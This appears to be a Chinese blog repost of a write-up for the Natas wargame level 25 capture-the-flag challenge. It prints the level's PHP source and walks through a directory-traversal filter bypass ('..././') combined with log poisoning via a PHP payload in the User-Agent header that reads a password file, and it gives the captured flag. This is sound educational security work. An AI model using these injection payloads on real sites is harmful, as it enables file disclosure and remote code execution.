Natas Wargame Level25 Writeup(头部注入+POST/GET注入)

最新推荐文章于 2024-07-14 18:57:12 发布
最新推荐文章于 2024-07-14 18:57:12 发布
阅读量153 收藏
点赞数
文章标签: php
原文链接:http://www.cnblogs.com/liqiuhao/p/6883356.html
版权

sourcecode核心代码:

 1 <?php
 2     // cheers and <3 to malvina
 3     // - morla
 4 
 5     function setLanguage(){
 6         /* language setup */
 7         if(array_key_exists("lang",$_REQUEST))
 8             if(safeinclude("language/" . $_REQUEST["lang"] ))
 9                 return 1;
10         safeinclude("language/en"); 
11     }
12     
13     function safeinclude($filename){
14         // check for directory traversal
15         if(strstr($filename,"../")){
16             logRequest("Directory traversal attempt! fixing request.");
17             $filename=str_replace("../","",$filename);
18         }
19         // dont let ppl steal our passwords
20         if(strstr($filename,"natas_webpass")){
21             logRequest("Illegal file access detected! Aborting!");
22             exit(-1);
23         }
24         // add more checks...
25 
26         if (file_exists($filename)) { 
27             include($filename);
28             return 1;
29         }
30         return 0;
31     }
32     
33     function listFiles($path){
34         $listoffiles=array();
35         if ($handle = opendir($path))
36             while (false !== ($file = readdir($handle)))
37                 if ($file != "." && $file != "..")
38                     $listoffiles[]=$file;
39         
40         closedir($handle);
41         return $listoffiles;
42     } 
43     
44     function logRequest($message){
45         $log="[". date("d.m.Y H::i:s",time()) ."]";
46         $log=$log . " " . $_SERVER['HTTP_USER_AGENT'];
47         $log=$log . " \"" . $message ."\"\n"; 
48         $fd=fopen("/var/www/natas/natas25/logs/natas25_" . session_id() .".log","a");
49         fwrite($fd,$log);
50         fclose($fd);
51     }
52 ?>
53 
54 <h1>natas25</h1>
55 <div id="content">
56 <div align="right">
57 <form>
58 <select name='lang' οnchange='this.form.submit()'>
59 <option>language</option>
60 <?php foreach(listFiles("language/") as $f) echo "<option>$f</option>"; ?>
61 </select>
62 </form>
63 </div>
64 
65 <?php  
66     session_start();
67     setLanguage();
68     
69     echo "<h2>$__GREETING</h2>";
70     echo "<p align=\"justify\">$__MSG";
71     echo "<div align=\"right\"><h6>$__FOOTER</h6><div>";
72 ?>

首先要将注入点分析清楚:一共有三个注入点

1.$_REQUEST["lang"] 即get/post注入

2.$_SERVER['HTTP_USER_AGENT'] http头部信息注入

3.session_id() cookie注入

23条注入能够发生的条件是safeinclude函数检测到了非法输入,而且必须是“../”这种非法输入,若是“web_pass”这种的话会直接exit(-1)。

这里第一条过滤非法输入语句存在漏洞,例如..././将../去掉后就变成了../,根本原因就在于没有使用while语句,没有想到过滤一次后依然(助攻)存在../,所以过滤应该持续检测直到非法字符不再出现。

第一条直接注入比较困难,原因在于即使用..././绕过了第一条检测,第二条检测也很难直接将"web_pass"下的密码给include进来,所以应该思考利用23两个注入,23两个注入必须触发“../”检测,随后logRequest($message)将信息写入/var/www/natas/natas25/logs/natas25_session_id().log。

很容易得到新思路,将“密码”或者能够显示密码的php语句写入到session_id().log之中,随后在safeinclude中将其include进来,由于这里是$_SERVER['HTTP_USER_AGENT'] (通过字符串串联起来),所以没法执行命令做字符串替换,可以考虑写入php语句:

<?php echo file_get_contents("/etc/natas_webpass/natas26")?>

参考:http://php.net/manual/zh/function.file-get-contents.php

这样做以后,只要触发第一条过滤机制,密码就会在.log被include进来时显示,考虑如何即触发../又能够将.log包含进来:GET: lang=..././..././..././..././..././var/www/natas/natas25/logs/natas25_session_id().log即可

流程:GET输入触发第一次过滤,开始记录日志,headers中http-agent的php执行语句被记录到/var/www/natas/natas25/logs/natas25_session_id().log。同时输入被过滤为../../../../../var/www/natas/natas25/logs/natas25_session_id().log。file_exists()检测正确,将其include进来,触发php echo 语句,显示flag。

有两个地方需要注入,即get/post 和 headers。

 

注:如果想要注入session_id的话(虽然这没什么用。。),记得改cookie,Firefox里面发送http请求时会自动将headers中的cookie该回为真实的值。

总结:1.过滤机制一定要达到在任何情况下确定不包含非法字符(考虑周全)2.对用户的输入(不一定是真的“输入”,只要是用户传过来的信息)都要做防注入或过滤处理。3.做题的思路很重要,一是要注意过滤机制是否不够严格,而是碰壁后应该全局思考所有的注入点,只要是自己能篡改的信息都要思考能否注入,而且可能是多个注入点联合使用

flag:oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T

转载于:https://www.cnblogs.com/liqiuhao/p/6883356.html

a_18067
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
wargame.kr 大部分writeup
Ni9htMar3的博客
03-03 3581
网址:http://wargame.kr/challenge already got
wargame narnia writeup
weixin_34392843的博客
03-08 268
litao3rd · 2015/04/09 11:02前言这一期的wargame难度明显比之前的leviathan要高,而且已经涉及到相对完善的Linux溢出相关知识了。但是在overthewire上这才居然只是2/10的难度,看来我差得很远啊。在narnia首页,有如下提示,使用初始账号和密码登陆到目标机器,关于本wargame的所有文件都在/narnia文件夹下面。Let's goTo log...
wargame.kr WriteUp
Bendawang's Blog
10-22 2838
wargame.kr
Natas Wargame Level26 Writeup(PHP对象注入
a_18067的博客
05-24 187
源码: <?php // sry, this is ugly as hell. // cheers kaliman ;) // - morla class Logger{ private $logFile; private $initMsg; private $exitMsg; ...
python挑战之level 25
jingza的博客
10-02 504
连接:http://www.pythonchallenge.com/pc/hex/lake.html 登陆密码;(butter,fly) ———————————————————————————————————————————————— 推荐视频:Python Challenge #25 imagine how they sound 声波拼图 ————————————————————
Natas Wargame Level20 Writeup(会话状态注入/篡改)
a_18067的博客
05-20 147
sourcecode核心代码: 1 <? 2 3 function debug($msg) { 4 if(array_key_exists("debug", $_GET)) { 5 print "DEBUG: $msg<br>"; 6 } 7 } 8 9 functi...
Natas Wargame Level27 Writeup(SQL表的注入/溢出与截取)
a_18067的博客
05-25 121
前端: <html> <head> <!-- This stuff in the header has nothing to do with the level --> </head> <body> <h1>natas27</h1> <div id="content"> <form ...
Natas Wargame Level 12 Writeup(文件上传漏洞)
a_18067的博客
05-12 158
sourcecode核心代码: 1 <? 2 3 function genRandomString() { 4 $length = 10; 5 $characters = "0123456789abcdefghijklmnopqrstuvwxyz"; 6 $string = ""; 7 8 for ...
natas:overthewire 战争游戏 natas 的解决方案集合
06-10
Natas: OverTheWire 战争游戏及Natas解决方案详解》 在网络安全学习和实践领域,OverTheWire是一个颇受欢迎的在线平台,它提供了一系列的战争游戏,旨在帮助用户提升对网络安全技术的理解和应用能力。其中,...
natas
02-23
标题 "natas" 提供的信息表明这是一个与网络通信和数据包监听有关的程序,可能用于网络安全分析或教学目的。在Windows 2000操作系统环境下,它利用原始套接字(raw socket)来捕获和解析IP数据包。在IT领域,原始套...
natas:纳塔斯兵棋推演
06-04
我看过一些 natas 的文章,但他们都使用 python 来解决挑战。 在玩这个游戏的过程中,我写了一些shellcode而不是python来解决许多更高层次的问题。 在这里,我将向您展示 shellcode 的强大功能, curl命令的魔力。 ...
Natas 幽灵王病毒的分析》
03-26
Natas 幽灵王病毒的分析》 很厉害的一个病毒分析案例
Natas-Solutions:试图解决纳塔斯问题
03-31
Natas问题通常围绕HTTP协议展开,涉及GET、POST请求、HTTP头(如Cookie)和HTTP响应。理解这些基本概念是解决Natas问题的第一步。 2. **身份验证与会话管理**: 许多Natas关卡涉及到基于用户名和密码的身份验证...
什么是RPC?有哪些RPC框架?
yuiezt的专栏
07-09 1847
RPC(Remote Procedure Call,远程过程调用)是一种允许运行在一台计算机上的程序调用另一台计算机上子程序的技术。这种技术屏蔽了底层的网络通信细节,使得程序间的远程通信如同本地调用一样简单。RPC机制使得开发者能够构建分布式计算系统,其中不同的组件可以分布在不同的计算机上,但它们之间可以像在同一台机器上一样相互调用。
PHP编程开发工具有哪些?
红客网络编程与渗透技术
07-10 1017
PHP的开发工具种类繁多,涵盖了从集成开发环境(IDE)、代码编辑器、调试器到版本控制工具和数据库管理工具等多个方面。以下是一些常见的PHP开发工具:### 1. 集成开发环境(IDE)* **PhpStorm**:由JetBrains开发的全功能PHP IDE,提供了代码自动完成、调试器、版本控制工具等丰富的功能,支持多种框架和技术。PhpStorm拥有最现代化的功能集,可以快速便捷地进行网页开发,并支持所有PHP语言功能,是专业PHP开发的优选工具。 * **Eclipse PDT**:基于Eclips
【Docker-compose】搭建php 环境
AllenIverrui的博客
07-10 994
ElasticSearch是一款非常强大的、基于Lucene的开源搜索及分析引擎;它是一个实时的分布式搜索分析引擎,它能让你以前所未有的速度和规模,去探索你的数据。它被用作全文检索结构化搜索分析以及这三个功能的组合:Wikipedia使用 Elasticsearch 提供带有高亮片段的全文搜索,还有 search-as-you-type 和 did-you-mean 的建议。卫报使用 Elasticsearch 将网络社交数据结合到访客日志中,为它的编辑们提供公众对于新文章的实时反馈。
喰星云·数字化餐饮服务系统 多处 SQL注入漏洞复现
最新发布
0xSec
07-14 242
喰星云·数字化餐饮服务系统 not_out_depot.php、shelflife.php、not_finish.php、stock.php等多处接口存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
深入探索Laravel框架中的Blade模板引擎
2402_85762143的博客
07-14 499
Blade是Laravel框架自带的模板引擎,它允许你使用纯PHP代码来编写HTML模板。Blade的语法非常简洁,它使用双大括号{{ }}来输出数据,使用三组大括号!!!来输出未转义的HTML内容,以及使用符号来定义控制结构,比如@foreach@if等。
natas Level 11-12(常见编码、异或逆推、修改cookie)怎么破解
03-29
Level 11: 1. 登录后,发现页面上有一个输入框,可以输入任意的字符串,然后点击“Submit Query”按钮,就会返回一个加密后的字符串。 2. 查看网页源代码,发现有一段JavaScript代码,其中包含了一个函数`encode...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值